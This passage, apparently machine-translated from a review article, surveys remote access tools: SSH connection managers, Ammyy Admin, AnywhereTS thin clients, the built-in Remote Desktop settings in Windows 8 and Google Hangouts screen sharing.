SSH remains a classic of remote access. It would seem, what else can you think of here? Well, for example, what if you have many remote machines? Register aliases for each? There are special utilities that allow you to quickly switch between machines. One such manager in Linux is the Gnome Connection Manager. The program is very convenient, we strongly recommend it. On Windows, AutoPuTTY is used for this purpose, a wrapper for the popular SSH / Telnet client PuTTY, which can be downloaded from http://www.r4dius.net/autoputty/. There is a similar SSH connection manager for OS X-Shuttle. For mobile platforms, you can use mobile SSH clients - Prompt (iOS) and ConnectBot (Android). You can easily find links and screenshots on the web.

Ammyy Admin (freeware)

Ammyy Admin is another program for remote desktop access. The good thing about the program is that it is absolutely free, completely undemanding to resources (the executable file generally occupies a ridiculous 700 KB), allows you to organize both regular remote access to the desktop and a connection in the style of a remote office, does not require installing and changing firewall settings. You can familiarize yourself with the rest of the program's features on the developers website.

AnywhereTS (freeware)

Allows you to convert computers to thin clients. The main purpose of this program is by no means remote access for technical support reasons, as in all the previously described programs, although it can also be used for this. AnywareTS allows you to give a second life to old computers that will be used as thin clients - to connect to a server that will run programs that are physically impossible to run on old PCs. You can find detailed information about this program on the developers website.

Remote access in Windows 8

This review would not be complete if we did not consider the capabilities of the OS itself. On the "server" (that is, on the computer to which remote access is planned), you need to do the following:

  • Run SystemPropertiesRemote.exe.
  • Enable the "Allow Remote Assistance connections to this computer" check box.
  • Turn on the "Allow remote connections to this computer" radio button and click the "Apply" button.
  • If you are using power-saving mode, you need to configure your computer so that it never goes into sleep mode.

On your computer, use the Remote Desktop Connection application to connect to a remote computer.

Rice. 15. Allowing remote access

Google Hangouts: screen sharing and video conferencing

As a last resort, you can use a new service from Google - Hangouts... It allows you to set up video calls during which users can share their screen with each other. If you wish, you can familiarize yourself with this service yourself.

Instead of a conclusion

There are a lot of programs for remote access. As I've hopefully shown, the most common tool isn't always the most effective. It is necessary to build on the conditions of a specific task, target platforms and other factors. Hopefully now I have finally cleared up the whole picture of remote access in your head. All suggestions and wishes can be sent to [email protected]